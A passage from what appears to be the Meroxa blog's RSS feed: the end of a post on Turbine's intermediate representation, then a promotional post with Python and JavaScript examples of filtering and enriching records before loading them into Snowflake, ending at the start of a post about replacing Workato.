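  return [...adjacency.keys()].some((node) => visit(node));
}
```

A valid topology such as source → function → destination passes the check, while a topology whose streams ever feed back into an earlier node is rejected before deployment.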
&lt;p&gt;Today, Turbine only allows a single source resource per application, but the IR approach gives us room to implement more flexibility in the future. In our IR schema, we also capture the Git SHA, the Turbine Language Library version, and any secret keys defined in the application that are necessary for deployment, all in a unified place.&lt;/p&gt;
&lt;p&gt;The use of IR in our orchestration allows for easier future feature development as well as adding support to new languages. We were able to add &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt; as one of the new supported languages completely with IR, and the implementation went seamlessly. As one of our upcoming projects, we will be creating a unified backend for Turbine, removing the need of each Turbine Language Library, and IR is a crucial step in the design. With this new approach, we created a consistent way to deploy, debug and update data applications on Meroxa across all languages that are supported.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Optimize and Realize Value in Snowflake with Meroxa]]></title><description><![CDATA[With Meroxa, companies optimize Snowflake storage, compute, operational costs and make their developers much more productive.]]></description><link>https://meroxa.com/blog/optimizevalueinsnowflake</link><guid isPermaLink="false">https://meroxa.com/blog/optimizevalueinsnowflake</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Thu, 02 Feb 2023 18:46:35 GMT</pubDate><content:encoded>&lt;p&gt;Snowflake is a company that offers cloud-based storage options. Customers don&apos;t have to set up or maintain servers because the whole data storage service is entirely managed. While it has several benefits for consumers, including simplicity, speed, and the ability to easily share data, many criticize it’s high price due to the high volume of queries users need to make and the amount of data they need to store on Snowflake.&lt;/p&gt;
&lt;p&gt;Some companies have tried to keep their Snowflake costs down by limiting business use or making the data warehouse developers do more work to limit the number of events that get sent to Snowflake. These methods aren&apos;t always feasible; they&apos;re often time-consuming and tedious, and they offer only marginal savings.&lt;/p&gt;
&lt;p&gt;With Meroxa, companies can cut their Snowflake storage and compute costs and make their developers much more productive. Meroxa allows you to easily:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Filter data before it&apos;s ingested&lt;/li&gt;
&lt;li&gt;Denormalize data to reduce compute costs&lt;/li&gt;
&lt;li&gt;Reduce operational costs&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run their Meroxa Turbine applications. Turbine is a stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scale using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will take care of streaming the data into the Turbine application so that it can be run. Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;&lt;/strong&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;&lt;strong&gt;Ruby&lt;/strong&gt;&lt;/a&gt;. Support for Java and C# is also on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many resources to get data from and to. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting &lt;strong&gt;any&lt;/strong&gt; data resource as a connector.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;How Meroxa reduces Snowflake costs&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Filtering data before it&apos;s ingested&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Filtering out unnecessary information before loading data into Snowflake reduces the quantity of data and, with it, storage and processing costs. As data is imported into Snowflake, it is kept in micro-partitions based on the date and time of ingestion; the more data you load, the more micro-partitions are produced, which can mean higher storage costs. In just a few lines of code, we can use Meroxa to filter out irrelevant data before loading it into Snowflake.&lt;/p&gt;
&lt;p&gt;A simple example in Turbine (Python), where we filter the data based on &lt;code class=&quot;language-text&quot;&gt;orderDollarValue&lt;/code&gt; would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; logging
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; sys

&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; RecordList
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Runtime

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;filter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; RecordList&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;processing &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; record(s)&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    filtered_records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
            orderDollarValue &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;orderDollarValue&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Keep only records where orderDollarValue &gt; 10000&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; orderDollarValue &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10000&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
                filtered_records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;append&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Error occurred while parsing records: &quot;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;output: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; filtered_records

&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@staticmethod&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Runtime&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token comment&quot;&gt;# Load and Read Tables from any source&lt;/span&gt;
            source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;myPostgreSQL&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# MySQL, Sql Server, Kafka, Mongo etc&lt;/span&gt;
            records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Process Data&lt;/span&gt;
            filtered &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;filter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

            &lt;span class=&quot;token comment&quot;&gt;# Write to any Destination&lt;/span&gt;
            destination_db &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mySnowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination_db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;filtered&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;collection_archive&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# Snowflake, S3, Mongo, Redshift etc&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;file&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;sys&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;stderr&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
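The filtering step itself is plain Python once the Turbine runtime is stripped away. Below is a hedged, framework-free sketch of the same predicate, with records modeled as plain dictionaries; the exact record shape is an assumption based on the example above, for illustration only.

```python
# Framework-free sketch of the filtering step above. Records are
# modeled as plain dicts with a "payload" key, mirroring the fields
# the Turbine example reads; the record shape is an assumption.

def filter_high_value(records, threshold=10000):
    """Keep only records whose payload's orderDollarValue exceeds threshold."""
    filtered = []
    for record in records:
        try:
            if record["payload"]["orderDollarValue"] > threshold:
                filtered.append(record)
        except (KeyError, TypeError) as e:
            # Malformed records are skipped rather than failing the batch,
            # just as the Turbine example logs and continues.
            print(f"Error occurred while parsing record: {e}")
    return filtered

orders = [
    {"payload": {"orderDollarValue": 25000}},
    {"payload": {"orderDollarValue": 500}},
    {"payload": {}},  # malformed: missing the field
]
kept = filter_high_value(orders)
print(len(kept))  # → 1
```

Only the 25,000-dollar order survives; everything else never reaches Snowflake, which is exactly where the storage savings come from.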
&lt;h3&gt;&lt;strong&gt;Denormalize data to reduce compute costs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Denormalizing data with Meroxa before loading it into Snowflake adds context that makes the data easier to understand and analyze. Denormalized records can answer certain questions directly, or be organized and structured in a way that makes them easier and cheaper to query, which means less time and money spent maintaining Snowflake and faster access to important information.&lt;/p&gt;
&lt;p&gt;In Turbine (JavaScript), a simple example of enriching and denormalizing addresses in our records using a third-party API would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Import any dependencies just like a regular application&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; googleMapsLookup&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; generateAddressObject &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;./googleMapsApi.js&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token function&quot;&gt;enrich&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;      
      &lt;span class=&quot;token comment&quot;&gt;// Call the Google Maps API and enrich the address on each record&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressLookupResults &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;googleMapsLookup&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; addressMetaData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;generateAddressObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;addressLookupResults&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
      record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;address_metadata&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; addressMetaData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// Load and Read Tables from any source&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;myPostgreSQL&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// MySQL, Sql Server, Kafka, Mongo etc&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_shipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// Process Data&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; enriched &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;enrich&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token comment&quot;&gt;// Write to any Destination&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mySnowflake&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Snowflake, S3, Mongo, Redshift etc&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;enriched&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;enriched_customer_shipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
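The enrichment step above is, at its core, a map over records: look up each address, attach the metadata. Here is a hedged, framework-free Python sketch of the same pattern, where the lookup function is a local stub standing in for the Google Maps call that the JS example delegates to `googleMapsApi.js`; the record shape is an assumption for illustration.

```python
# Framework-free sketch of the enrichment step above. The lookup is
# a stub standing in for the Google Maps API; records are plain dicts
# (an assumption), mirroring the get/set calls in the JS example.

def stub_address_lookup(address):
    """Stand-in for a geocoding API: returns fake metadata for an address."""
    return {"normalized": address.strip().title(), "country": "US"}

def enrich(records, lookup=stub_address_lookup):
    """Attach address_metadata to every record, as the JS enrich() does."""
    for record in records:
        record["address_metadata"] = lookup(record["address"])
    return records

shipments = [{"address": "123 main st"}, {"address": "456 oak ave"}]
enriched = enrich(shipments)
print(enriched[0]["address_metadata"]["normalized"])  # → 123 Main St
```

Because the lookup is injected as a parameter, the real API client can be swapped in without touching the enrichment logic, which also makes the transform easy to unit test.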
&lt;p&gt;💡 For a more detailed example of using APIs &amp;#x26; doing transformations in Turbine, you can read our blog post &lt;a href=&quot;https://meroxa.com/blog/using-turbine-to-call-multiple-apis-in-real-time-to-transform-enrich-your-data&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Reduce operational costs&lt;/h3&gt;
&lt;p&gt;Meroxa allows developers of any level to build data pipelines to ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know. Without it, this process typically requires Snowflake subject matter experts, and delivering data projects can take months. Meroxa lets anyone work like a Snowflake expert and reduces the number of hours and resources needed to support Snowflake, ultimately delivering data projects faster.&lt;/p&gt;
&lt;p&gt;A typical workflow for a data project with Meroxa is cost-effective, enterprise-ready in days, allows for rapid prototypes &amp;#x26; conclusions, and offers code reusability:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Save%20on%20Snowflake%20Blog%20Post%20Image.png&quot; alt=&quot;Save on Snowflake Blog Post Image&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Meroxa Key Benefits&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Code First&lt;/strong&gt; - Developers can build data products in the language of their choice with the ultimate flexibility that code provides. Import packages and modules to easily build with data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open-Source&lt;/strong&gt; - Built on open-source technology to give enterprises the security and flexibility they need. No vendor lock-in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easily manage hundreds of integrations&lt;/strong&gt; - Our innovative platform automatically creates a shared data stream catalog and embeds it into your workflows so you can search, find, and reuse data streams effortlessly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Automatically connect, configure, and orchestrate data integrations&lt;/strong&gt; - Don’t stress over data orchestration: our platform has over a dozen pre-configured integrations for databases, cloud, SaaS apps, and streaming services…and we’re adding more on a regular basis.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scale dynamically with serverless architecture&lt;/strong&gt; - Build reusable and scalable components with standardized processes, allowing you to work efficiently while maximizing available resources.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Build, Test, Deploy&lt;/strong&gt; - it’s that simple. Build your stream processing application using a language of your choice, test with data we sample for you, and deploy your application.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Want to learn more about how Meroxa can help you realize more value in Snowflake? &lt;a href=&quot;https://meetings.hubspot.com/jamie-aliperti/website-schedule-a-demo&quot;&gt;Schedule a demo today&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Save Money on Workato and Gain Real-Time Data Streaming with Meroxa]]></title><description><![CDATA[Meroxa saved money by replacing Workato with a Turbine data app which allows you to quickly sync, persist, and transform data between data infrastructures.]]></description><link>https://meroxa.com/blog/save-money-on-workato-and-gain-real-time-data-streaming-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/save-money-on-workato-and-gain-real-time-data-streaming-with-meroxa</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 25 Jan 2023 20:11:23 GMT</pubDate><content:encoded>&lt;p&gt;In my last post I contrasted data apps with web apps, which was a fairly high-level discussion. This time around, I decided to get a little more hands on and show you how we’re using data apps at Meroxa to power Meroxa the business. The app I’m going to talk about is one we developed to simplify how we get account and subscription data to Salesforce so our sales and marketing teams could make use of it.&lt;/p&gt;
&lt;h1&gt;Where we started&lt;/h1&gt;
